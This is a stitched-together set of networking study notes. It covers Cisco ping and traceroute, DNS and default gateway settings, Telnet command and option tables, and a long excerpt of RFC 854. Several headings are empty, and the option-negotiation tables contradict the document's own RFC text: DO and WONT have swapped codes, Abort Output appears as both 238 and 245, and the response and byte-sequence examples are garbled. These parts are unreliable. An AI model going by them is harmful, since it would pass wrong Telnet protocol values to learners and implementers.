Sending 5, 100-byte IPXcisco Echoes to 101A.0060.5cc4.f41b, timeout is 2 seconds
:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/5/8 ms

Although generally a TCP/IP utility, ping works with a number of protocols beyond IP and IPX. For a complete list of the protocols that ping supports on your router, issue the command ping ?.

The Traceroute Diagnostic Utility

By Dan DiNicolo, June 26th, 2006 Posted in CCNA Study Guide Chapter 07.

Another useful utility is testing connectivity, especially in routed environments, is traceroute. While ping tests for basic connectivity with another host, traceroute will show you the path that a packet takes (in terms of crossing intermediate routers) between a source and destination. Since we haven’t set up routing yet, traceroute won’t provide us with much useful information. In a routed environment, traceroute provides valuable information because it helps to indicate at which point in a packet’s travels a failure is occurring. Issues might include an intermediate router being offline, or physical connection problems.

Traceroute works by sending groups of 3 UDP datagrams to the destination address specified, with varying time to live (TTL) values. For example, imagine there are three routers between our system and the destination host that we’re to determine the path to. Traceroute will send out 3 UDP datagrams with a TTL of one. When these hit the first router in the path, their TTL will be decremented by one, causing the packets to expire. ICMP “time exceeded” messages will be sent back to the source host. It will then send out another 3 UDP datagrams with a TTL of 2, which will exceed their TTL at the second router. This process continues until the destination host is reached. The cumulative information provided shows the path to the destination. If the process fails at any point, this indicates or suggests a problem area between the source and destination. Traceroute is an exceptionally simple and powerful troubleshooting tool in routed environments. To use it, simply enter traceroute followed by the destination IP address or hostname.

cisco2501#traceroute 192.168.1.209
Type escape sequence to abort.
Tracing the route to 192.168.1.209
1 192.168.1.209 4 msec 40 msec *

As I mentioned previously, traceroute doesn’t provide very much information on our network yet. Once some routing is configured, we’ll be able to see multiple hops in the path to a destination.

Understanding and Configuring DNS Settings

By Dan DiNicolo, April 13th, 2007 Posted in Windows XP

Assuming that you do plan to use your home network to share an Internet connection, one addition piece of information that you’ll need to supply as part of the TCP/IP configuration of computers is the IP address of one or more DNS servers. DNS is the domain name system, which is responsible for translating fully qualified domain names (FQDNs) into IP addresses on the public Internet. For example, when you attempt to access the PC Answers website, you would typically submit the FQDN www.pcanswers.co.uk in the address bar of your web browser. While this name is easier to remember than the IP address of the PC Answers website, TCP/IP ultimately requires the IP address of the site in order to make communication possible. The “resolution” of FQDNs to IP addresses on the public Internet is the primary responsibility of DNS servers.

The IP address that you would enter in the DNS server address section of your TCP/IP properties typically belongs to a DNS server of your ISP. This information is usually provided by the ISP when sign up for their service. This is not to say that it is impossible to host your own DNS server on your network, because it is indeed possible. However, most home network users really have no need for an internal DNS server, a topic that we’ll explore further in future articles in this series.

One thing that you’ll notice with the configuration of DNS settings is that Windows versions allow you to configure the IP addresses of both a “preferred” and “alternate” DNS server (the terms used differ between Windows versions). The main reason for this is redundancy. If your computer attempts to contact one DNS server to resolve a name to an IP address and the server is unavailable, the second DNS server will be sent the queries. One DNS server IP address is usually sufficient, but if this server becomes unavailable, you would no longer be able to resolve names correctly, so configuring both is a good idea. Unless, of course, you want to try to remember the IP address associated with every website you ever visit – certainly not a simple task.

Understanding the Purpose of the Default Gateway

By Dan DiNicolo, April 13th, 2007 Posted in Windows XP.

When configuring TCP/IP settings on your home network, only an IP address and subnet mask are explicitly required. However, if you want your computers to be able to communicate with outside networks (like the Internet), you will also need to configure a default gateway IP address. The default gateway is the IP address to which packets destined for outside networks are sent by default. To be clearer, the default gateway is the IP address of a router connected to the local network. For home users, this would be the internal IP address of your hardware router, or of the computer configured as a NAT server (such as a Windows XP system running ICS). Just remember that if you need to communicate with an outside network like the Internet, you will need to configure a default gateway IP address as well.

Windows Networking Utilities :

For example, to ping the PC Answers web server, you would type ping www.pcanwers.co.uk, press Enter. If you receive 4 echo reply messages, you’re likely up and running correctly.

Windows XP Network Diagnostic Tools :

TELNET Protocol :

SUMMARY

MORE INFORMATION

The Network Virtual Terminal :

Name	Code	Decimal Value	Function
NULL	NUL	0	No operation
Line Feed	LF	10	Moves the printer to the next print line, keeping the same horizontal position.
Carriage Return	CR	13	Moves the printer to the left margin of the current line.

The following further control codes are optional but should have the indicated defined effect on the display.

Name	Code	Decimal Value	Function
BELL	BEL	7	Produces an audible or visible signal (which does NOT move the print head.
Back Space	BS	8	Moves the print head one character position towards the left margin. (On a printing device, this mechanism was commonly used to form composite characters by printing two basic characters on top of each other.)
Horizontal Tab	HT	9	Moves the printer to the next horizontal tab stop. It remains unspecified how either party determines or establishes where such tab stops are located.
Vertical Tab	VT	11	Moves the printer to the next vertical tab stop. It remains unspecified how either party determines or establishes where such tab stops are located.
Form Feed	FF	12	Moves the printer to the top of the next page, keeping the same horizontal position. (On visual displays, this commonly clears the screen and moves the cursor to the top left corner.)

The NVT keyboard is specified as being capable of generating all 128 ASCII codes by using keys, key combinations, or key sequences.

Commands

Name	Decimal Code	Meaning	Comment
SE	240	End of subnegotiation parameters
NOP	241	No operation
DM	242	Data mark	Indicates the position of a Synch event within the data stream. This should always be accompanied by a TCP urgent notification.
BRK	243	Break	Indicates that the "break" or "attention" key was hi.
IP	244	Suspend	Interrupt or abort the process to which the NVT is connected.
AO	245	Abort output	Allows the current process to run to completion but does not send its output to the user.
AYT	246	Are you there	Send back to the NVT some visible evidence that the AYT was received.
EC	247	Erase character	The receiver should delete the last preceding undeleted character from the data stream.
EL	248	Erase line	Delete characters from the data stream back to but not including the previous CRLF.
GA	249	Go ahead	Under certain circumstances used to tell the other end that it can transmit.
SB	250	Subnegotiation	Subnegotiation of the indicated option follows.
WILL	251	will	Indicates the desire to begin performing, or confirmation that you are now performing, the indicated option.
WONT	252	wont	Indicates the refusal to perform, or continue performing, the indicated option.
DO	253	do	Indicates the request that the other party perform, or confirmation that you are expecting the other party to perform, the indicated option.
DONT	254	dont	Indicates the demand that the other party stop performing, or confirmation that you are no longer expecting the other party to perform, the indicated option.
IAC	255	Interpret as command	Interpret as a command

Telnet Options

Decimal code	Name	RFC
3	suppress go ahead	858
5	status	859
1	echo	857
6	timing mark	860
24	terminal type	1091
31	window size	1073
32	terminal speed	1079
33	remote flow control	1372
34	linemode	1184
36	environment variables	1408

Either end of a Telnet conversation can locally or remotely enable or disable an option. The initiator sends a 3-byte command of the form:

IAC

Type of Operation

Option

The response is of the same form. Operation is one of:

Description	Decimal Code	Action
WILL	251	Sender wants to do something.
DO	252	Sender wants the other end to do something.
WONT	253	Sender does not want to do something.
DONT	254	Sender wants the other not to do something.

Associated with each of the these commands are various possible responses:

Sender Sent	Receiver Responds	Implication
WILL DO	The sender would like to use a certain facility if the receiver can handle it.	Option is now in effect.
WILL DONT	Receiver says it cannot support the option.	Option is not in effect.
DO WILL	The sender says it can handle traffic from the sender if the sender wishes to use a certain option.	Option is now in effect.
DO WONT	Receiver says it cannot support the option.	Option is not in effect.
WONT DONT	Option disabled.	DONT is only valid response.
DONT WONT	Option disabled.	WONT is only valid response.

For example, if the sender wants the other end to suppress go-ahead, it would send the byte sequence:

IAC

WILL

Suppress Go Ahead

IAC

option code

IAC

and

IAC

option code

IAC

For example, if the client wants to identify the terminal type to the server, the following exchange might take place:

CLIENT

IAC

WILL

Terminal Type

SERVER

IAC

Terminal Type

CLIENT

IAC

Terminal Type

IAC

SERVER

IAC

Terminal Type

IAC

Descriptions of Telnet Options

Many of those listed are self-evident, but some call for more information.

Suppress Go Ahead

Echo

Linemode

This option replaces and supersedes the line mode kludge.

Remote Flow Control

This option controls where the special flow control effects of Ctrl+S or Ctrl+Q are implemented.

Telnet Control Functions

Interrupt Process

This is used by the client to cause the suspension or termination of the server process. Typically, the user types Ctrl+C on the keyboard. An IP (244) character is included in the data stream.

Abort Output

This is used to suppress the transmission of remote process output. An AO (238) character is included in the data stream.

Are You There

This is used to trigger a visible response from the other end of the connection to confirm the operation of the link and the remote process. An AYT (246) character is incorporated in the data stream.

Erase character

This is sent to the display to tell it to delete the immediately preceding character from the display. An EC (247) character is incorporated in the data stream.

Erase line

This option causes the deletion of the current line of input. An EL (248) character is incorporated in the data stream.

Data Mark

The Telnet Command

On Windows NT and most UNIX systems, a Telnet session can be initiated using the Telnet command. Most users simply type:

telnet remote_host

However, if the user just types telnet, then various options and subcommands are available.

The following is an example of a Telnet session from sfuclnt to sfusrvr.

APPLIES TO

•	Microsoft Windows 2000 Server
•	Microsoft Windows 2000 Advanced Server
•	Microsoft Windows 2000 Professional Edition
•	Microsoft Windows NT Services for UNIX Add-On Pack
•	Microsoft Windows NT Server 3.5
•	Microsoft Windows NT Server 3.51
•	Microsoft Windows NT Server 4.0 Standard Edition
•	Microsoft Windows NT Workstation 3.5
•	Microsoft Windows NT Workstation 3.51
•	Microsoft Windows NT Workstation 4.0 Developer Edition

Network Working Group                                          J. Postel

Request for Comments: 854                                    J. Reynolds

ISI

Obsoletes: NIC 18639                                            May 1983

                     TELNET PROTOCOL SPECIFICATION

This RFC specifies a standard for the ARPA Internet community.  Hosts on

the ARPA Internet are expected to adopt and implement this standard.

INTRODUCTION

   The purpose of the TELNET Protocol is to provide a fairly general,

   bi-directional, eight-bit byte oriented communications facility.  Its

   primary goal is to allow a standard method of interfacing terminal

   devices and terminal-oriented processes to each other.  It is

   envisioned that the protocol may also be used for terminal-terminal

   communication ("linking") and process-process communication

   (distributed computation).

GENERAL CONSIDERATIONS

   A TELNET connection is a Transmission Control Protocol (TCP)

   connection used to transmit data with interspersed TELNET control

   information.

   The TELNET Protocol is built upon three main ideas:  first, the

   concept of a "Network Virtual Terminal"; second, the principle of

   negotiated options; and third, a symmetric view of terminals and

   processes.

   1.  When a TELNET connection is first established, each end is

   assumed to originate and terminate at a "Network Virtual Terminal",

   or NVT.  An NVT is an imaginary device which provides a standard,

   network-wide, intermediate representation of a canonical terminal.

   This eliminates the need for "server" and "user" hosts to keep

   information about the characteristics of each other's terminals and

   terminal handling conventions.  All hosts, both user and server, map

   their local device characteristics and conventions so as to appear to

   be dealing with an NVT over the network, and each can assume a

   similar mapping by the other party.  The NVT is intended to strike a

   balance between being overly restricted (not providing hosts a rich

   enough vocabulary for mapping into their local character sets), and

   being overly inclusive (penalizing users with modest terminals).

      NOTE:  The "user" host is the host to which the physical terminal

      is normally attached, and the "server" host is the host which is

      normally providing some service.  As an alternate point of view,

RFC 854                                                         May 1983

      applicable even in terminal-to-terminal or process-to-process

      communications, the "user" host is the host which initiated the

      communication.

   2.  The principle of negotiated options takes cognizance of the fact

   that many hosts will wish to provide additional services over and

   above those available within an NVT, and many users will have

   sophisticated terminals and would like to have elegant, rather than

   minimal, services.  Independent of, but structured within the TELNET

   Protocol are various "options" that will be sanctioned and may be

   used with the "DO, DON'T, WILL, WON'T" structure (discussed below) to

   allow a user and server to agree to use a more elaborate (or perhaps

   just different) set of conventions for their TELNET connection.  Such

   options could include changing the character set, the echo mode, etc.

   The basic strategy for setting up the use of options is to have

   either party (or both) initiate a request that some option take

   effect.  The other party may then either accept or reject the

   request.  If the request is accepted the option immediately takes

   effect; if it is rejected the associated aspect of the connection

   remains as specified for an NVT.  Clearly, a party may always refuse

   a request to enable, and must never refuse a request to disable some

   option since all parties must be prepared to support the NVT.

   The syntax of option negotiation has been set up so that if both

   parties request an option simultaneously, each will see the other's

   request as the positive acknowledgment of its own.

   3.  The symmetry of the negotiation syntax can potentially lead to

   nonterminating acknowledgment loops -- each party seeing the incoming

   commands not as acknowledgments but as new requests which must be

   acknowledged.  To prevent such loops, the following rules prevail:

      a. Parties may only request a change in option status; i.e., a

      party may not send out a "request" merely to announce what mode it

      is in.

      b. If a party receives what appears to be a request to enter some

      mode it is already in, the request should not be acknowledged.

      This non-response is essential to prevent endless loops in the

      negotiation.  It is required that a response be sent to requests

      for a change of mode -- even if the mode is not changed.

      c. Whenever one party sends an option command to a second party,

      whether as a request or an acknowledgment, and use of the option

      will have any effect on the processing of the data being sent from

      the first party to the second, then the command must be inserted

      in the data stream at the point where it is desired that it take

RFC 854                                                         May 1983

      effect.  (It should be noted that some time will elapse between

      the transmission of a request and the receipt of an

      acknowledgment, which may be negative.  Thus, a host may wish to

      buffer data, after requesting an option, until it learns whether

      the request is accepted or rejected, in order to hide the

      "uncertainty period" from the user.)

   Option requests are likely to flurry back and forth when a TELNET

   connection is first established, as each party attempts to get the

   best possible service from the other party.  Beyond that, however,

   options can be used to dynamically modify the characteristics of the

   connection to suit changing local conditions.  For example, the NVT,

   as will be explained later, uses a transmission discipline well

   suited to the many "line at a time" applications such as BASIC, but

   poorly suited to the many "character at a time" applications such as

   NLS.  A server might elect to devote the extra processor overhead

   required for a "character at a time" discipline when it was suitable

   for the local process and would negotiate an appropriate option.

   However, rather than then being permanently burdened with the extra

   processing overhead, it could switch (i.e., negotiate) back to NVT

   when the detailed control was no longer necessary.

   It is possible for requests initiated by processes to stimulate a

   nonterminating request loop if the process responds to a rejection by

   merely re-requesting the option.  To prevent such loops from

   occurring, rejected requests should not be repeated until something

   changes.  Operationally, this can mean the process is running a

   different program, or the user has given another command, or whatever

   makes sense in the context of the given process and the given option.

   A good rule of thumb is that a re-request should only occur as a

   result of subsequent information from the other end of the connection

   or when demanded by local human intervention.

   Option designers should not feel constrained by the somewhat limited

   syntax available for option negotiation.  The intent of the simple

   syntax is to make it easy to have options -- since it is

   correspondingly easy to profess ignorance about them.  If some

   particular option requires a richer negotiation structure than

   possible within "DO, DON'T, WILL, WON'T", the proper tack is to use

   "DO, DON'T, WILL, WON'T" to establish that both parties understand

   the option, and once this is accomplished a more exotic syntax can be

   used freely.  For example, a party might send a request to alter

   (establish) line length.  If it is accepted, then a different syntax

   can be used for actually negotiating the line length -- such a

   "sub-negotiation" might include fields for minimum allowable, maximum

   allowable and desired line lengths.  The important concept is that

RFC 854                                                         May 1983

   such expanded negotiations should never begin until some prior

   (standard) negotiation has established that both parties are capable

   of parsing the expanded syntax.

   In summary, WILL XXX is sent, by either party, to indicate that

   party's desire (offer) to begin performing option XXX, DO XXX and

   DON'T XXX being its positive and negative acknowledgments; similarly,

   DO XXX is sent to indicate a desire (request) that the other party

   (i.e., the recipient of the DO) begin performing option XXX, WILL XXX

   and WON'T XXX being the positive and negative acknowledgments.  Since

   the NVT is what is left when no options are enabled, the DON'T and

   WON'T responses are guaranteed to leave the connection in a state

   which both ends can handle.  Thus, all hosts may implement their

   TELNET processes to be totally unaware of options that are not

   supported, simply returning a rejection to (i.e., refusing) any

   option request that cannot be understood.

   As much as possible, the TELNET protocol has been made server-user

   symmetrical so that it easily and naturally covers the user-user

   (linking) and server-server (cooperating processes) cases.  It is

   hoped, but not absolutely required, that options will further this

   intent.  In any case, it is explicitly acknowledged that symmetry is

   an operating principle rather than an ironclad rule.

   A companion document, "TELNET Option Specifications," should be

   consulted for information about the procedure for establishing new

   options.

THE NETWORK VIRTUAL TERMINAL

   The Network Virtual Terminal (NVT) is a bi-directional character

   device.  The NVT has a printer and a keyboard.  The printer responds

   to incoming data and the keyboard produces outgoing data which is

   sent over the TELNET connection and, if "echoes" are desired, to the

   NVT's printer as well.  "Echoes" will not be expected to traverse the

   network (although options exist to enable a "remote" echoing mode of

   operation, no host is required to implement this option).  The code

   set is seven-bit USASCII in an eight-bit field, except as modified

   herein.  Any code conversion and timing considerations are local

   problems and do not affect the NVT.

   TRANSMISSION OF DATA

      Although a TELNET connection through the network is intrinsically

      full duplex, the NVT is to be viewed as a half-duplex device

      operating in a line-buffered mode.  That is, unless and until

RFC 854                                                         May 1983

      options are negotiated to the contrary, the following default

      conditions pertain to the transmission of data over the TELNET

      connection:

         1)  Insofar as the availability of local buffer space permits,

         data should be accumulated in the host where it is generated

         until a complete line of data is ready for transmission, or

         until some locally-defined explicit signal to transmit occurs.

         This signal could be generated either by a process or by a

         human user.

         The motivation for this rule is the high cost, to some hosts,

         of processing network input interrupts, coupled with the

         default NVT specification that "echoes" do not traverse the

         network.  Thus, it is reasonable to buffer some amount of data

         at its source.  Many systems take some processing action at the

         end of each input line (even line printers or card punches

         frequently tend to work this way), so the transmission should

         be triggered at the end of a line.  On the other hand, a user

         or process may sometimes find it necessary or desirable to

         provide data which does not terminate at the end of a line;

         therefore implementers are cautioned to provide methods of

         locally signaling that all buffered data should be transmitted

         immediately.

         2)  When a process has completed sending data to an NVT printer

         and has no queued input from the NVT keyboard for further

         processing (i.e., when a process at one end of a TELNET

         connection cannot proceed without input from the other end),

         the process must transmit the TELNET Go Ahead (GA) command.

         This rule is not intended to require that the TELNET GA command

         be sent from a terminal at the end of each line, since server

         hosts do not normally require a special signal (in addition to

         end-of-line or other locally-defined characters) in order to

         commence processing.  Rather, the TELNET GA is designed to help

         a user's local host operate a physically half duplex terminal

         which has a "lockable" keyboard such as the IBM 2741.  A

         description of this type of terminal may help to explain the

         proper use of the GA command.

         The terminal-computer connection is always under control of

         either the user or the computer.  Neither can unilaterally

         seize control from the other; rather the controlling end must

         relinguish its control explicitly.  At the terminal end, the

         hardware is constructed so as to relinquish control each time

         that a "line" is terminated (i.e., when the "New Line" key is

         typed by the user).  When this occurs, the attached (local)

RFC 854                                                         May 1983

         computer processes the input data, decides if output should be

         generated, and if not returns control to the terminal.  If

         output should be generated, control is retained by the computer

         until all output has been transmitted.

         The difficulties of using this type of terminal through the

         network should be obvious.  The "local" computer is no longer

         able to decide whether to retain control after seeing an

         end-of-line signal or not; this decision can only be made by

         the "remote" computer which is processing the data.  Therefore,

         the TELNET GA command provides a mechanism whereby the "remote"

         (server) computer can signal the "local" (user) computer that

         it is time to pass control to the user of the terminal.  It

         should be transmitted at those times, and only at those times,

         when the user should be given control of the terminal.  Note

         that premature transmission of the GA command may result in the

         blocking of output, since the user is likely to assume that the

         transmitting system has paused, and therefore he will fail to

         turn the line around manually.

      The foregoing, of course, does not apply to the user-to-server

      direction of communication.  In this direction, GAs may be sent at

      any time, but need not ever be sent.  Also, if the TELNET

      connection is being used for process-to-process communication, GAs

      need not be sent in either direction.  Finally, for

      terminal-to-terminal communication, GAs may be required in

      neither, one, or both directions.  If a host plans to support

      terminal-to-terminal communication it is suggested that the host

      provide the user with a means of manually signaling that it is

      time for a GA to be sent over the TELNET connection; this,

      however, is not a requirement on the implementer of a TELNET

      process.

      Note that the symmetry of the TELNET model requires that there is

      an NVT at each end of the TELNET connection, at least

      conceptually.

   STANDARD REPRESENTATION OF CONTROL FUNCTIONS

      As stated in the Introduction to this document, the primary goal

      of the TELNET protocol is the provision of a standard interfacing

      of terminal devices and terminal-oriented processes through the

      network.  Early experiences with this type of interconnection have

      shown that certain functions are implemented by most servers, but

      that the methods of invoking these functions differ widely.  For a

      human user who interacts with several server systems, these

      differences are highly frustrating.  TELNET, therefore, defines a

      standard representation for five of these functions, as described

RFC 854                                                         May 1983

      below.  These standard representations have standard, but not

      required, meanings (with the exception that the Interrupt Process

      (IP) function may be required by other protocols which use

      TELNET); that is, a system which does not provide the function to

      local users need not provide it to network users and may treat the

      standard representation for the function as a No-operation.  On

      the other hand, a system which does provide the function to a

      local user is obliged to provide the same function to a network

      user who transmits the standard representation for the function.

      Interrupt Process (IP)

         Many systems provide a function which suspends, interrupts,

         aborts, or terminates the operation of a user process.  This

         function is frequently used when a user believes his process is

         in an unending loop, or when an unwanted process has been

         inadvertently activated.  IP is the standard representation for

         invoking this function.  It should be noted by implementers

         that IP may be required by other protocols which use TELNET,

         and therefore should be implemented if these other protocols

         are to be supported.

      Abort Output (AO)

         Many systems provide a function which allows a process, which

         is generating output, to run to completion (or to reach the

         same stopping point it would reach if running to completion)

         but without sending the output to the user's terminal.

         Further, this function typically clears any output already

         produced but not yet actually printed (or displayed) on the

         user's terminal.  AO is the standard representation for

         invoking this function.  For example, some subsystem might

         normally accept a user's command, send a long text string to

         the user's terminal in response, and finally signal readiness

         to accept the next command by sending a "prompt" character

         (preceded by ) to the user's terminal.  If the AO were

         received during the transmission of the text string, a

         reasonable implementation would be to suppress the remainder of

         the text string, but transmit the prompt character and the

         preceding .  (This is possibly in distinction to the

         action which might be taken if an IP were received; the IP

         might cause suppression of the text string and an exit from the

         subsystem.)

         It should be noted, by server systems which provide this

         function, that there may be buffers external to the system (in

RFC 854                                                         May 1983

         the network and the user's local host) which should be cleared;

         the appropriate way to do this is to transmit the "Synch"

         signal (described below) to the user system.

      Are You There (AYT)

         Many systems provide a function which provides the user with

         some visible (e.g., printable) evidence that the system is

         still up and running.  This function may be invoked by the user

         when the system is unexpectedly "silent" for a long time,

         because of the unanticipated (by the user) length of a

         computation, an unusually heavy system load, etc.  AYT is the

         standard representation for invoking this function.

      Erase Character (EC)

         Many systems provide a function which deletes the last

         preceding undeleted character or "print position"* from the

         stream of data being supplied by the user.  This function is

         typically used to edit keyboard input when typing mistakes are

         made.  EC is the standard representation for invoking this

         function.

            *NOTE:  A "print position" may contain several characters

            which are the result of overstrikes, or of sequences such as

             BS ...

      Erase Line (EL)

         Many systems provide a function which deletes all the data in

         the current "line" of input.  This function is typically used

         to edit keyboard input.  EL is the standard representation for

         invoking this function.

   THE TELNET "SYNCH" SIGNAL

      Most time-sharing systems provide mechanisms which allow a

      terminal user to regain control of a "runaway" process; the IP and

      AO functions described above are examples of these mechanisms.

      Such systems, when used locally, have access to all of the signals

      supplied by the user, whether these are normal characters or

      special "out of band" signals such as those supplied by the

      teletype "BREAK" key or the IBM 2741 "ATTN" key.  This is not

      necessarily true when terminals are connected to the system

      through the network; the network's flow control mechanisms may

      cause such a signal to be buffered elsewhere, for example in the

      user's host.

RFC 854                                                         May 1983

      To counter this problem, the TELNET "Synch" mechanism is

      introduced.  A Synch signal consists of a TCP Urgent notification,

      coupled with the TELNET command DATA MARK.  The Urgent

      notification, which is not subject to the flow control pertaining

      to the TELNET connection, is used to invoke special handling of

      the data stream by the process which receives it.  In this mode,

      the data stream is immediately scanned for "interesting" signals

      as defined below, discarding intervening data.  The TELNET command

      DATA MARK (DM) is the synchronizing mark in the data stream which

      indicates that any special signal has already occurred and the

      recipient can return to normal processing of the data stream.

         The Synch is sent via the TCP send operation with the Urgent

         flag set and the DM as the last (or only) data octet.

      When several Synchs are sent in rapid succession, the Urgent

      notifications may be merged.  It is not possible to count Urgents

      since the number received will be less than or equal the number

      sent.  When in normal mode, a DM is a no operation; when in urgent

      mode, it signals the end of the urgent processing.

         If TCP indicates the end of Urgent data before the DM is found,

         TELNET should continue the special handling of the data stream

         until the DM is found.

         If TCP indicates more Urgent data after the DM is found, it can

         only be because of a subsequent Synch.  TELNET should continue

         the special handling of the data stream until another DM is

         found.

      "Interesting" signals are defined to be:  the TELNET standard

      representations of IP, AO, and AYT (but not EC or EL); the local

      analogs of these standard representations (if any); all other

      TELNET commands; other site-defined signals which can be acted on

      without delaying the scan of the data stream.

      Since one effect of the SYNCH mechanism is the discarding of

      essentially all characters (except TELNET commands) between the

      sender of the Synch and its recipient, this mechanism is specified

      as the standard way to clear the data path when that is desired.

      For example, if a user at a terminal causes an AO to be

      transmitted, the server which receives the AO (if it provides that

      function at all) should return a Synch to the user.

      Finally, just as the TCP Urgent notification is needed at the

      TELNET level as an out-of-band signal, so other protocols which

      make use of TELNET may require a TELNET command which can be

      viewed as an out-of-band signal at a different level.

RFC 854                                                         May 1983

      By convention the sequence [IP, Synch] is to be used as such a

      signal.  For example, suppose that some other protocol, which uses

      TELNET, defines the character string STOP analogously to the

      TELNET command AO.  Imagine that a user of this protocol wishes a

      server to process the STOP string, but the connection is blocked

      because the server is processing other commands.  The user should

      instruct his system to:

         1. Send the TELNET IP character;

         2. Send the TELNET SYNC sequence, that is:

            Send the Data Mark (DM) as the only character

            in a TCP urgent mode send operation.

         3. Send the character string STOP; and

         4. Send the other protocol's analog of the TELNET DM, if any.

      The user (or process acting on his behalf) must transmit the

      TELNET SYNCH sequence of step 2 above to ensure that the TELNET IP

      gets through to the server's TELNET interpreter.

         The Urgent should wake up the TELNET process; the IP should

         wake up the next higher level process.

   THE NVT PRINTER AND KEYBOARD

      The NVT printer has an unspecified carriage width and page length

      and can produce representations of all 95 USASCII graphics (codes

      32 through 126).  Of the 33 USASCII control codes (0 through 31

      and 127), and the 128 uncovered codes (128 through 255), the

      following have specified meaning to the NVT printer:

         NAME                  CODE         MEANING

         NULL (NUL)              0      No Operation

         Line Feed (LF)         10      Moves the printer to the

                                        next print line, keeping the

                                        same horizontal position.

         Carriage Return (CR)   13      Moves the printer to the left

                                        margin of the current line.

RFC 854                                                         May 1983

         In addition, the following codes shall have defined, but not

         required, effects on the NVT printer.  Neither end of a TELNET

         connection may assume that the other party will take, or will

         have taken, any particular action upon receipt or transmission

         of these:

         BELL (BEL)              7      Produces an audible or

                                        visible signal (which does

                                        NOT move the print head).

         Back Space (BS)         8      Moves the print head one

                                        character position towards

                                        the left margin.

         Horizontal Tab (HT)     9      Moves the printer to the

                                        next horizontal tab stop.

                                        It remains unspecified how

                                        either party determines or

                                        establishes where such tab

                                        stops are located.

         Vertical Tab (VT)       11     Moves the printer to the

                                        next vertical tab stop.  It

                                        remains unspecified how

                                        either party determines or

                                        establishes where such tab

                                        stops are located.

         Form Feed (FF)          12     Moves the printer to the top

                                        of the next page, keeping

                                        the same horizontal position.

      All remaining codes do not cause the NVT printer to take any

      action.

      The sequence "CR LF", as defined, will cause the NVT to be

      positioned at the left margin of the next print line (as would,

      for example, the sequence "LF CR").  However, many systems and

      terminals do not treat CR and LF independently, and will have to

      go to some effort to simulate their effect.  (For example, some

      terminals do not have a CR independent of the LF, but on such

      terminals it may be possible to simulate a CR by backspacing.)

      Therefore, the sequence "CR LF" must be treated as a single "new

      line" character and used whenever their combined action is

      intended; the sequence "CR NUL" must be used where a carriage

      return alone is actually desired; and the CR character must be

      avoided in other contexts.  This rule gives assurance to systems

      which must decide whether to perform a "new line" function or a

      multiple-backspace that the TELNET stream contains a character

      following a CR that will allow a rational decision.

         Note that "CR LF" or "CR NUL" is required in both directions

RFC 854                                                         May 1983

         (in the default ASCII mode), to preserve the symmetry of the

         NVT model.  Even though it may be known in some situations

         (e.g., with remote echo and suppress go ahead options in

         effect) that characters are not being sent to an actual

         printer, nonetheless, for the sake of consistency, the protocol

         requires that a NUL be inserted following a CR not followed by

         a LF in the data stream.  The converse of this is that a NUL

         received in the data stream after a CR (in the absence of

         options negotiations which explicitly specify otherwise) should

         be stripped out prior to applying the NVT to local character

         set mapping.

      The NVT keyboard has keys, or key combinations, or key sequences,

      for generating all 128 USASCII codes.  Note that although many

      have no effect on the NVT printer, the NVT keyboard is capable of

      generating them.

      In addition to these codes, the NVT keyboard shall be capable of

      generating the following additional codes which, except as noted,

      have defined, but not reguired, meanings.  The actual code

      assignments for these "characters" are in the TELNET Command

      section, because they are viewed as being, in some sense, generic

      and should be available even when the data stream is interpreted

      as being some other character set.

      Synch

         This key allows the user to clear his data path to the other

         party.  The activation of this key causes a DM (see command

         section) to be sent in the data stream and a TCP Urgent

         notification is associated with it.  The pair DM-Urgent is to

         have required meaning as defined previously.

      Break (BRK)

         This code is provided because it is a signal outside the

         USASCII set which is currently given local meaning within many

         systems.  It is intended to indicate that the Break Key or the

         Attention Key was hit.  Note, however, that this is intended to

         provide a 129th code for systems which require it, not as a

         synonym for the IP standard representation.

      Interrupt Process (IP)

         Suspend, interrupt, abort or terminate the process to which the

         NVT is connected.  Also, part of the out-of-band signal for

         other protocols which use TELNET.

RFC 854                                                         May 1983

      Abort Output (AO)

         Allow the current process to (appear to) run to completion, but

         do not send its output to the user.  Also, send a Synch to the

         user.

      Are You There (AYT)

         Send back to the NVT some visible (i.e., printable) evidence

         that the AYT was received.

      Erase Character (EC)

         The recipient should delete the last preceding undeleted

         character or "print position" from the data stream.

      Erase Line (EL)

         The recipient should delete characters from the data stream

         back to, but not including, the last "CR LF" sequence sent over

         the TELNET connection.

      The spirit of these "extra" keys, and also the printer format

      effectors, is that they should represent a natural extension of

      the mapping that already must be done from "NVT" into "local".

      Just as the NVT data byte 68 (104 octal) should be mapped into

      whatever the local code for "uppercase D" is, so the EC character

      should be mapped into whatever the local "Erase Character"

      function is.  Further, just as the mapping for 124 (174 octal) is

      somewhat arbitrary in an environment that has no "vertical bar"

      character, the EL character may have a somewhat arbitrary mapping

      (or none at all) if there is no local "Erase Line" facility.

      Similarly for format effectors:  if the terminal actually does

      have a "Vertical Tab", then the mapping for VT is obvious, and

      only when the terminal does not have a vertical tab should the

      effect of VT be unpredictable.

TELNET COMMAND STRUCTURE

   All TELNET commands consist of at least a two byte sequence:  the

   "Interpret as Command" (IAC) escape character followed by the code

   for the command.  The commands dealing with option negotiation are

   three byte sequences, the third byte being the code for the option

   referenced.  This format was chosen so that as more comprehensive use

   of the "data space" is made -- by negotiations from the basic NVT, of

   course -- collisions of data bytes with reserved command values will

   be minimized, all such collisions requiring the inconvenience, and

RFC 854                                                         May 1983

   inefficiency, of "escaping" the data bytes into the stream.  With the

   current set-up, only the IAC need be doubled to be sent as data, and

   the other 255 codes may be passed transparently.

   The following are the defined TELNET commands.  Note that these codes

   and code sequences have the indicated meaning only when immediately

   preceded by an IAC.

      NAME               CODE              MEANING

      SE                  240    End of subnegotiation parameters.

      NOP                 241    No operation.

      Data Mark           242    The data stream portion of a Synch.

                                 This should always be accompanied

                                 by a TCP Urgent notification.

      Break               243    NVT character BRK.

      Interrupt Process   244    The function IP.

      Abort output        245    The function AO.

      Are You There       246    The function AYT.

      Erase character     247    The function EC.

      Erase Line          248    The function EL.

      Go ahead            249    The GA signal.

      SB                  250    Indicates that what follows is

                                 subnegotiation of the indicated

                                 option.

      WILL (option code)  251    Indicates the desire to begin

                                 performing, or confirmation that

                                 you are now performing, the

                                 indicated option.

      WON'T (option code) 252    Indicates the refusal to perform,

                                 or continue performing, the

                                 indicated option.

      DO (option code)    253    Indicates the request that the

                                 other party perform, or

                                 confirmation that you are expecting

                                 the other party to perform, the

                                 indicated option.

      DON'T (option code) 254    Indicates the demand that the

                                 other party stop performing,

                                 or confirmation that you are no

                                 longer expecting the other party

                                 to perform, the indicated option.

